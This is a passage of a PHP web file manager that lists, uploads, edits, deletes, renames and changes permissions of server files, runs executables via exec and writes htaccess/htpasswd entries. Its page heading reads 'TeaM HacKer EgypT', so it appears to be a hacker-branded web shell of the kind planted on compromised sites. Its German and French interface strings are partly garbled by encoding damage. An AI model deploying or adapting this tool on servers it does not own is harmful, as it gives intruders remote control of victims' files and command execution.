    		<td style="border-right: 1px solid black">' . word('group') . '</td>
    		<td>' . word('other') . '</td>
    	</tr>
    	<tr>
    		<td style="text-align: right">' . word('read') . ':</td>
    		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
    	</tr>
    	<tr>
    		<td style="text-align: right">' . word('write') . ':</td>
    		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
    	</tr>
    	<tr>
    		<td style="text-align: right">' . word('execute') . ':</td>
    		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
    	</tr>
    	</table>
    
    	<hr />
    
    	<input type="submit" name="set" value="' . word('set') . '" />
    
    	<input type="hidden" name="action" value="permission" />
    	<input type="hidden" name="file" value="' . html($file) . '" />
    	<input type="hidden" name="dir" value="' . html($directory) . '" />
    
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    default:
    
    	listing_page();
    
    }
    
    /* ------------------------------------------------------------------------- */
    
    function getlist ($directory) {
    	global $delim, $win;
    
    	if ($d = @opendir($directory)) {
    
    		while (($filename = @readdir($d)) !== false) {
    
    			$path = $directory . $filename;
    
    			if ($stat = @lstat($path)) {
    
    				$file = array(
    					'filename'    => $filename,
    					'path'        => $path,
    					'is_file'     => @is_file($path),
    					'is_dir'      => @is_dir($path),
    					'is_link'     => @is_link($path),
    					'is_readable' => @is_readable($path),
    					'is_writable' => @is_writable($path),
    					'size'        => $stat['size'],
    					'permission'  => $stat['mode'],
    					'owner'       => $stat['uid'],
    					'group'       => $stat['gid'],
    					'mtime'       => @filemtime($path),
    					'atime'       => @fileatime($path),
    					'ctime'       => @filectime($path)
    				);
    
    				if ($file['is_dir']) {
    					$file['is_executable'] = @file_exists($path . $delim . '.');
    				} else {
    					if (!$win) {
    						$file['is_executable'] = @is_executable($path);
    					} else {
    						$file['is_executable'] = true;
    					}
    				}
    
    				if ($file['is_link']) $file['target'] = @readlink($path);
    
    				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
    				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
    
    				$files[] = $file;
    
    			}
    
    		}
    
    		return $files;
    
    	} else {
    		return false;
    	}
    
    }
    
    function sortlist (&$list, $key, $reverse) {
    
    	quicksort($list, 0, sizeof($list) - 1, $key);
    
    	if ($reverse) $list = array_reverse($list);
    
    }
    
    function quicksort (&$array, $first, $last, $key) {
    
    	if ($first < $last) {
    
    		$cmp = $array[floor(($first + $last) / 2)][$key];
    
    		$l = $first;
    		$r = $last;
    
    		while ($l <= $r) {
    
    			while ($array[$l][$key] < $cmp) $l++;
    			while ($array[$r][$key] > $cmp) $r--;
    
    			if ($l <= $r) {
    
    				$tmp = $array[$l];
    				$array[$l] = $array[$r];
    				$array[$r] = $tmp;
    
    				$l++;
    				$r--;
    
    			}
    
    		}
    
    		quicksort($array, $first, $r, $key);
    		quicksort($array, $l, $last, $key);
    
    	}
    
    }
    
    function permission_octal2string ($mode) {
    
    	if (($mode & 0xC000) === 0xC000) {
    		$type = 's';
    	} elseif (($mode & 0xA000) === 0xA000) {
    		$type = 'l';
    	} elseif (($mode & 0x8000) === 0x8000) {
    		$type = '-';
    	} elseif (($mode & 0x6000) === 0x6000) {
    		$type = 'b';
    	} elseif (($mode & 0x4000) === 0x4000) {
    		$type = 'd';
    	} elseif (($mode & 0x2000) === 0x2000) {
    		$type = 'c';
    	} elseif (($mode & 0x1000) === 0x1000) {
    		$type = 'p';
    	} else {
    		$type = '?';
    	}
    
    	$owner  = ($mode & 00400) ? 'r' : '-';
    	$owner .= ($mode & 00200) ? 'w' : '-';
    	if ($mode & 0x800) {
    		$owner .= ($mode & 00100) ? 's' : 'S';
    	} else {
    		$owner .= ($mode & 00100) ? 'x' : '-';
    	}
    
    	$group  = ($mode & 00040) ? 'r' : '-';
    	$group .= ($mode & 00020) ? 'w' : '-';
    	if ($mode & 0x400) {
    		$group .= ($mode & 00010) ? 's' : 'S';
    	} else {
    		$group .= ($mode & 00010) ? 'x' : '-';
    	}
    
    	$other  = ($mode & 00004) ? 'r' : '-';
    	$other .= ($mode & 00002) ? 'w' : '-';
    	if ($mode & 0x200) {
    		$other .= ($mode & 00001) ? 't' : 'T';
    	} else {
    		$other .= ($mode & 00001) ? 'x' : '-';
    	}
    
    	return $type . $owner . $group . $other;
    
    }
    
    function is_script ($filename) {
    	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
    }
    
    function getmimetype ($filename) {
    	static $mimes = array(
    		'\.jpg$|\.jpeg$'  => 'image/jpeg',
    		'\.gif$'          => 'image/gif',
    		'\.png$'          => 'image/png',
    		'\.html$|\.html$' => 'text/html',
    		'\.txt$|\.asc$'   => 'text/plain',
    		'\.xml$|\.xsl$'   => 'application/xml',
    		'\.pdf$'          => 'application/pdf'
    	);
    
    	foreach ($mimes as $regex => $mime) {
    		if (eregi($regex, $filename)) return $mime;
    	}
    
    	// return 'application/octet-stream';
    	return 'text/plain';
    
    }
    
    function del ($file) {
    	global $delim;
    
    	if (!@is_link($file) && !file_exists($file)) return false;
    
    	if (!@is_link($file) && @is_dir($file)) {
    
    		if ($dir = @opendir($file)) {
    
    			$error = false;
    
    			while (($f = readdir($dir)) !== false) {
    				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
    					$error = true;
    				}
    			}
    			closedir($dir);
    
    			if (!$error) return @rmdir($file);
    
    			return !$error;
    
    		} else {
    			return false;
    		}
    
    	} else {
    		return @unlink($file);
    	}
    
    }
    
    function addslash ($directory) {
    	global $delim;
    
    	if (substr($directory, -1, 1) != $delim) {
    		return $directory . $delim;
    	} else {
    		return $directory;
    	}
    
    }
    
    function relative2absolute ($string, $directory) {
    
    	if (path_is_relative($string)) {
    		return simplify_path(addslash($directory) . $string);
    	} else {
    		return simplify_path($string);
    	}
    
    }
    
    function path_is_relative ($path) {
    	global $win;
    
    	if ($win) {
    		return (substr($path, 1, 1) != ':');
    	} else {
    		return (substr($path, 0, 1) != '/');
    	}
    
    }
    
    function absolute2relative ($directory, $target) {
    	global $delim;
    
    	$path = '';
    	while ($directory != $target) {
    		if ($directory == substr($target, 0, strlen($directory))) {
    			$path .= substr($target, strlen($directory));
    			break;
    		} else {
    			$path .= '..' . $delim;
    			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
    		}
    	}
    	if ($path == '') $path = '.';
    
    	return $path;
    
    }
    
    function simplify_path ($path) {
    	global $delim;
    
    	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
    		$path = realpath($path);
    		if (@is_dir($path)) {
    			return addslash($path);
    		} else {
    			return $path;
    		}
    	}
    
    	$pattern  = $delim . '.' . $delim;
    
    	if (@is_dir($path)) {
    		$path = addslash($path);
    	}
    
    	while (strpos($path, $pattern) !== false) {
    		$path = str_replace($pattern, $delim, $path);
    	}
    
    	$e = addslashes($delim);
    	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
    
    	while (ereg($regex, $path)) {
    		$path = ereg_replace($regex, $delim, $path);
    	}
    	
    	return $path;
    
    }
    
    function human_filesize ($filesize) {
    
    	$suffices = 'kMGTPE';
    
    	$n = 0;
    	while ($filesize >= 1000) {
    		$filesize /= 1024;
    		$n++;
    	}
    
    	$filesize = round($filesize, 3 - strpos($filesize, '.'));
    
    	if (strpos($filesize, '.') !== false) {
    		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
    			$filesize = substr($filesize, 0, strlen($filesize) - 1);
    		}
    	}
    
    	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
    
    	return $filesize . " {$suffix}B";
    
    }
    
    function strip (&$str) {
    	$str = stripslashes($str);
    }
    
    /* ------------------------------------------------------------------------- */
    
    function listing_page ($message = null) {
    	global $self, $directory, $sort, $reverse;
    
    	html_header();
    
    	$list = getlist($directory);
    
    	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
    	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
    
    	sortlist($list, $sort, $reverse);
    
    	echo '<h1 style="margin-bottom: 0">TeaM HacKer EgypT</h1>
    
    <form enctype="multipart/form-data" action="' . $self . '" method="post">
    
    <table id="main">
    ';
    
    	directory_choice();
    
    	if (!empty($message)) {
    		spacer();
    		echo $message;
    	}
    
    	if (@is_writable($directory)) {
    		upload_box();
    		create_box();
    	} else {
    		spacer();
    	}
    
    	if ($list) {
    		listing($list);
    	} else {
    		echo error('not_readable', $directory);
    	}
    
    	echo '</table>
    
    </form>
    
    ';
    
    	html_footer();
    
    }
    
    function listing ($list) {
    	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
    
    	echo '<tr class="listing">
    	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
    ';
    
    	$d = 'dir=' . urlencode($directory) . '&';
    
    	if (!$reverse && $sort == 'filename') $r = '&reverse=true'; else $r = '';
    	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
    
    	if (!$reverse && $sort == 'size') $r = '&reverse=true'; else $r = '';
    	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
    
    	if (!$win) {
    
    		if (!$reverse && $sort == 'permission') $r = '&reverse=true'; else $r = '';
    		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
    
    		if (!$reverse && $sort == 'owner') $r = '&reverse=true'; else $r = '';
    		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
    
    		if (!$reverse && $sort == 'group') $r = '&reverse=true'; else $r = '';
    		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
    
    	}
    
    	echo '	<th class="functions">' . word('functions') . '</th>
    </tr>
    ';
    
    	for ($i = 0; $i < sizeof($list); $i++) {
    		$file = $list[$i];
    
    		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
    		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
    		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
    
    		echo '<tr class="listing">
    	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
    	<td class="filename" title="' . html($timestamps) . '">';
    
    		if ($file['is_link']) {
    
    			echo '<img src="' . $self . '?image=link" alt="link" /> ';
    			echo html($file['filename']) . ' → ';
    
    			$real_file = relative2absolute($file['target'], $directory);
    
    			if (@is_readable($real_file)) {
    				if (@is_dir($real_file)) {
    					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
    				} else {
    					echo '<a href="' . $self . '?action=view&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
    				}
    			} else {
    				echo html($file['target']);
    			}
    
    		} elseif ($file['is_dir']) {
    
    			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
    			if ($win || $file['is_executable']) {
    				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
    			} else {
    				echo html($file['filename']);
    			}
    			echo ' ]';
    
    		} else {
    
    			if (substr($file['filename'], 0, 1) == '.') {
    				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
    			} else {
    				echo '<img src="' . $self . '?image=file" alt="file" /> ';
    			}
    
    			if ($file['is_file'] && $file['is_readable']) {
    			   echo '<a href="' . $self . '?action=view&file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
    			} else {
    				echo html($file['filename']);
    			}
    
    		}
    
    		if ($file['size'] >= 1000) {
    			$human = ' title="' . human_filesize($file['size']) . '"';
    		} else {
    			$human = '';
    		}
    
    		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
    
    		if (!$win) {
    
    			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
    
    			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
    			if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($file['path']) . '&dir=' . urlencode($directory) . '">';
    			echo html(permission_octal2string($file['permission']));
    			if ($l) echo '</a>';
    
    			echo "</td>\n";
    
    			if (array_key_exists('owner_name', $file)) {
    				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
    			} else {
    				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
    			}
    
    			if (array_key_exists('group_name', $file)) {
    				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
    			} else {
    				echo "\t<td class=\"group\">{$file['group']}</td>\n";
    			}
    
    		}
    
    		echo '	<td class="functions">
    		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
    ';
    
    		$actions = array();
    		if (function_exists('symlink')) {
    			$actions[] = 'create_symlink';
    		}
    		if (@is_writable(dirname($file['path']))) {
    			$actions[] = 'delete';
    			$actions[] = 'rename';
    			$actions[] = 'move';
    		}
    		if ($file['is_file'] && $file['is_readable']) {
    			$actions[] = 'copy';
    			$actions[] = 'download';
    			if ($file['is_writable']) $actions[] = 'edit';
    		}
    		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
    			$actions[] = 'execute';
    		}
    
    		if (sizeof($actions) > 0) {
    
    			echo '		<select class="small" name="action' . $i . '" size="1">
    		<option value="">' . str_repeat(' ', 30) . '</option>
    ';
    
    			foreach ($actions as $action) {
    				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    			}
    
    			echo '		</select>
    		<input class="small" type="submit" name="submit' . $i . '" value=" > " onfocus="activate(\'other\')" />
    ';
    
    		}
    
    		echo '	</td>
    </tr>
    ';
    
    	}
    
    	echo '<tr class="listing_footer">
    	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt=">" /></td>
    	<td colspan="' . ($cols - 1) . '">
    		<input type="hidden" name="num" value="' . sizeof($list) . '" />
    		<input type="hidden" name="focus" value="" />
    		<input type="hidden" name="olddir" value="' . html($directory) . '" />
    ';
    
    	$actions = array();
    	if (@is_writable(dirname($file['path']))) {
    		$actions[] = 'delete';
    		$actions[] = 'move';
    	}
    	$actions[] = 'copy';
    
    	echo '		<select class="small" name="action_all" size="1">
    		<option value="">' . str_repeat(' ', 30) . '</option>
    ';
    
    	foreach ($actions as $action) {
    		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    	}
    
    	echo '		</select>
    		<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate(\'other\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function directory_choice () {
    	global $directory, $homedir, $cols, $self;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" id="directory">
    		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
    		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
    		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function upload_box () {
    	global $cols;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" id="upload">
    		' . word('file') . ':
    		<input type="file" name="upload" onfocus="activate(\'other\')" />
    		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function create_box () {
    	global $cols;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" id="create">
    		<select name="create_type" size="1" onfocus="activate(\'create\')">
    		<option value="file">' . word('file') . '</option>
    		<option value="directory">' . word('directory') . '</option>
    		</select>
    		<input type="text" name="create_name" onfocus="activate(\'create\')" />
    		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function edit ($file) {
    	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
    
    	html_header();
    
    	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
    
    <form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    
    	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
    
    	if (array_key_exists('content', $_POST)) {
    		echo $_POST['content'];
    	} else {
    		$f = fopen($file, 'r');
    		while (!feof($f)) {
    			echo html(fread($f, 8192));
    		}
    		fclose($f);
    	}
    
    	if (!empty($_POST['user'])) {
    		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
    	}
    	if (!empty($_POST['basic_auth'])) {
    		if ($win) {
    			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
    		} else {
    			$authfile = $directory . $htpasswd;
    		}
    		echo "\nAuthType Basic\nAuthName "Restricted Directory"\n";
    		echo 'AuthUserFile "' . html($authfile) . ""\n";
    		echo 'Require valid-user';
    	}
    
    	echo '</textarea>
    
    	<hr />
    ';
    
    	if ($apache && basename($file) == $htpasswd) {
    		echo '
    	' . word('user') . ': <input type="text" name="user" />
    	' . word('password') . ': <input type="password" name="password" />
    	<input type="submit" value="' . word('add') . '" />
    
    	<hr />
    ';
    
    	}
    
    	if ($apache && basename($file) == $htaccess) {
    		echo '
    	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
    
    	<hr />
    ';
    
    	}
    
    	echo '
    	<input type="hidden" name="action" value="edit" />
    	<input type="hidden" name="file" value="' . html($file) . '" />
    	<input type="hidden" name="dir" value="' . html($directory) . '" />
    	<input type="reset" value="' . word('reset') . '" id="red_button" />
    	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
    
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    	html_footer();
    
    }
    
    function spacer () {
    	global $cols;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" style="height: 1em"></td>
    </tr>
    ';
    
    }
    
    function textfieldsize ($content) {
    
    	$size = strlen($content) + 5;
    	if ($size < 30) $size = 30;
    
    	return $size;
    
    }
    
    function request_dump () {
    
    	foreach ($_REQUEST as $key => $value) {
    		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
    	}
    
    }
    
    /* ------------------------------------------------------------------------- */
    
    function html ($string) {
    	global $site_charset;
    	return htmlentities($string, ENT_COMPAT, $site_charset);
    }
    
    function word ($word) {
    	global $words, $word_charset;
    	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
    }
    
    function phrase ($phrase, $arguments) {
    	global $words;
    	static $search;
    
    	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
    
    	for ($i = 0; $i < sizeof($arguments); $i++) {
    		$arguments[$i] = nl2br(html($arguments[$i]));
    	}
    
    	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
    
    	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
    
    }
    
    function getwords ($lang) {
    	global $word_charset, $date_format;
    
    	switch ($lang) {
    	case 'de':
    
    		$date_format = 'd.m.y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Verzeichnis',
    'file' => 'Datei',
    'filename' => 'Dateiname',
    
    'size' => 'Grِكe',
    'permission' => 'Rechte',
    'owner' => 'Eigner',
    'group' => 'Gruppe',
    'other' => 'Andere',
    'functions' => 'Funktionen',
    
    'read' => 'lesen',
    'write' => 'schreiben',
    'execute' => 'ausfhren',
    
    'create_symlink' => 'Symlink erstellen',
    'delete' => 'lِschen',
    'rename' => 'umbenennen',
    'move' => 'verschieben',
    'copy' => 'kopieren',
    'edit' => 'editieren',
    'download' => 'herunterladen',
    'upload' => 'hochladen',
    'create' => 'erstellen',
    'change' => 'wechseln',
    'save' => 'speichern',
    'set' => 'setze',
    'reset' => 'zurcksetzen',
    'relative' => 'Pfad zum Ziel relativ',
    
    'yes' => 'Ja',
    'no' => 'Nein',
    'back' => 'zurck',
    'destination' => 'Ziel',
    'symlink' => 'Symbolischer Link',
    'no_output' => 'keine Ausgabe',
    
    'user' => 'Benutzername',
    'password' => 'Kennwort',
    'add' => 'hinzufgen',
    'add_basic_auth' => 'HTTP-Basic-Auth hinzufgen',
    
    'uploaded' => '"[%1]" wurde hochgeladen.',
    'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
    'already_exists' => '"[%1]" existiert bereits.',
    'created' => '"[%1]" wurde erstellt.',
    'not_created' => '"[%1]" konnte nicht erstellt werden.',
    'really_delete' => 'Sollen folgende Dateien wirklich gelِscht werden?',
    'deleted' => "Folgende Dateien wurden gelِscht:\n[%1]",
    'not_deleted' => "Folgende Dateien konnten nicht gelِscht werden:\n[%1]",
    'rename_file' => 'Benenne Datei um:',
    'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
    'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
    'move_files' => 'Verschieben folgende Dateien:',
    'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
    'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
    'copy_files' => 'Kopiere folgende Dateien:',
    'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
    'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
    'not_edited' => '"[%1]" kann nicht editiert werden.',
    'executed' => "\"[%1]\" wurde erfolgreich ausgefhrt:\n{%2}",
    'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgefhrt werden:\n{%2}",
    'saved' => '"[%1]" wurde gespeichert.',
    'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
    'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
    'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
    'permission_for' => 'Rechte fr "[%1]":',
    'permission_set' => 'Die Rechte fr "[%1]" wurden auf [%2] gesetzt.',
    'permission_not_set' => 'Die Rechte fr "[%1]" konnten nicht auf [%2] gesetzt werden.',
    'not_readable' => '"[%1]" kann nicht gelesen werden.'
    		);
    
    	case 'fr':
    
    		$date_format = 'd.m.y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Rpertoire',
    'file' => 'Fichier',
    'filename' => 'Nom fichier',
    
    'size' => 'Taille',
    'permission' => 'Droits',
    'owner' => 'Propritaire',
    'group' => 'Groupe',
    'other' => 'Autres',
    'functions' => 'Fonctions',
    
    'read' => 'Lire',
    'write' => 'Ecrire',
    'execute' => 'Excuter',
    
    'create_symlink' => 'Crer lien symbolique',
    'delete' => 'Effacer',
    'rename' => 'Renommer',
    'move' => 'Dplacer',
    'copy' => 'Copier',
    'edit' => 'Ouvrir',
    'download' => 'Tlcharger sur PC',
    'upload' => 'Tlcharger sur serveur',
    'create' => 'Crer',
    'change' => 'Changer',
    'save' => 'Sauvegarder',
    'set' => 'Excuter',
    'reset' => 'Rinitialiser',
    'relative' => 'Relatif',
    
    'yes' => 'Oui',
    'no' => 'Non',
    'back' => 'Retour',
    'destination' => 'Destination',
    'symlink' => 'Lien symbollique',
    'no_output' => 'Pas de sortie',
    
    'user' => 'Utilisateur',
    'password' => 'Mot de passe',
    'add' => 'Ajouter',
    'add_basic_auth' => 'add basic-authentification',
    
    'uploaded' => '"[%1]" a t tlcharg sur le serveur.',
    'not_uploaded' => '"[%1]" n a pas t tlcharg sur le serveur.',
    'already_exists' => '"[%1]" existe dj.',
    'created' => '"[%1]" a t cr.',
    'not_created' => '"[%1]" n a pas pu tre cr.',
    'really_delete' => 'Effacer le fichier?',
    'deleted' => "Ces fichiers ont t dtuits:\n[%1]",
    'not_deleted' => "Ces fichiers n ont pu tre dtruits:\n[%1]",
    'rename_file' => 'Renomme fichier:',
    'renamed' => '"[%1]" a t renomm en "[%2]".',
    'not_renamed' => '"[%1] n a pas pu tre renomm en "[%2]".',
    'move_files' => 'Dplacer ces fichiers:',
    'moved' => "Ces fichiers ont t dplacs en \"[%2]\":\n[%1]",
    'not_moved' => "Ces fichiers n ont pas pu tre dplacs en \"[%2]\":\n[%1]",
    'copy_files' => 'Copier ces fichiers:',
    'copied' => "Ces fichiers ont t copis en \"[%2]\":\n[%1]",
    'not_copied' => "Ces fichiers n ont pas pu tre copis en \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" ne peut tre ouvert.',
    'executed' => "\"[%1]\" a t brillamment excut :\n{%2}",
    'not_executed' => "\"[%1]\" n a pas pu tre excut:\n{%2}",
    'saved' => '"[%1]" a t sauvegard.',
    'not_saved' => '"[%1]" n a pas pu tre sauvegard.',
    'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a t cre.',
    'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu tre cr.',
    'permission_for' => 'Droits de "[%1]":',
    'permission_set' => 'Droits de "[%1]" ont t changs en [%2].',
    'permission_not_set' => 'Droits de "[%1]" n ont pas pu tre changs en[%2].',
    'not_readable' => '"[%1]" ne peut pas tre ouvert.'
    		);
    
    	case 'it':
    
    		$date_format = 'd-m-Y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directory',
    'file' => 'File',
    'filename' => 'Nome File',
    
    'size' => 'Dimensioni',
    'permission' => 'Permessi',
    'owner' => 'Proprietario',
    'group' => 'Gruppo',
    'other' => 'Altro',
    'functions' => 'Funzioni',
    
    'read' => 'leggi',
    'write' => 'scrivi',
    'execute' => 'esegui',
    
    'create_symlink' => 'crea link simbolico',
    'delete' => 'cancella',
    'rename' => 'rinomina',
    'move' => 'sposta',
    'copy' => 'copia',
    'edit' => 'modifica',
    'download' => 'download',
    'upload' => 'upload',
    'create' => 'crea',
    'change' => 'cambia',
    'save' => 'salva',
    'set' => 'imposta',
    'reset' => 'reimposta',
    'relative' => 'Percorso relativo per la destinazione',
    
    'yes' => 'Si',
    'no' => 'No',
    'back' => 'indietro',
    'destination' => 'Destinazione',
    'symlink' => 'Link simbolico',
    'no_output' => 'no output',
    
    'user' => 'User',
    'password' => 'Password',
    'add' => 'aggiungi',
    'add_basic_auth' => 'aggiungi autenticazione base',
    
    'uploaded' => '"[%1]"  stato caricato.',
    'not_uploaded' => '"[%1]" non  stato caricato.',
    'already_exists' => '"[%1]" esiste gi.',
    'created' => '"[%1]"  stato creato.',
    'not_created' => '"[%1]" non  stato creato.',
    'really_delete' => 'Cancello questi file ?',
    'deleted' => "Questi file sono stati cancellati:\n[%1]",
    'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
    'rename_file' => 'File rinominato:',
    'renamed' => '"[%1]"  stato rinominato in "[%2]".',
    'not_renamed' => '"[%1] non  stato rinominato in "[%2]".',
    'move_files' => 'Sposto questi file:',
    'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
    'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
    'copy_files' => 'Copio questi file',
    'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
    'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" non puٍ essere modificato.',
    'executed' => "\"[%1]\"  stato eseguito con successo:\n{%2}",
    'not_executed' => "\"[%1]\" non  stato eseguito con successo\n{%2}",
    'saved' => '"[%1]"  stato salvato.',
    'not_saved' => '"[%1]" non  stato salvato.',
    'symlinked' => 'Il link siambolico da "[%2]" a "[%1]"  stato creato.',
    'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non  stato creato.',
    'permission_for' => 'Permessi di "[%1]":',
    'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
    'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
    'not_readable' => '"[%1]" non puٍ essere letto.'
    		);
    
    	case 'nl':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directory',
    'file' => 'Bestand',
    'filename' => 'Bestandsnaam',
    
    'size' => 'Grootte',
    'permission' => 'Bevoegdheid',
    'owner' => 'Eigenaar',
    'group' => 'Groep',
    'other' => 'Anderen',
    'functions' => 'Functies',
    
    'read' => 'lezen',
    'write' => 'schrijven',
    'execute' => 'uitvoeren',
    
    'create_symlink' => 'maak symlink',
    'delete' => 'verwijderen',
    'rename' => 'hernoemen',
    'move' => 'verplaatsen',
    'copy' => 'kopieren',
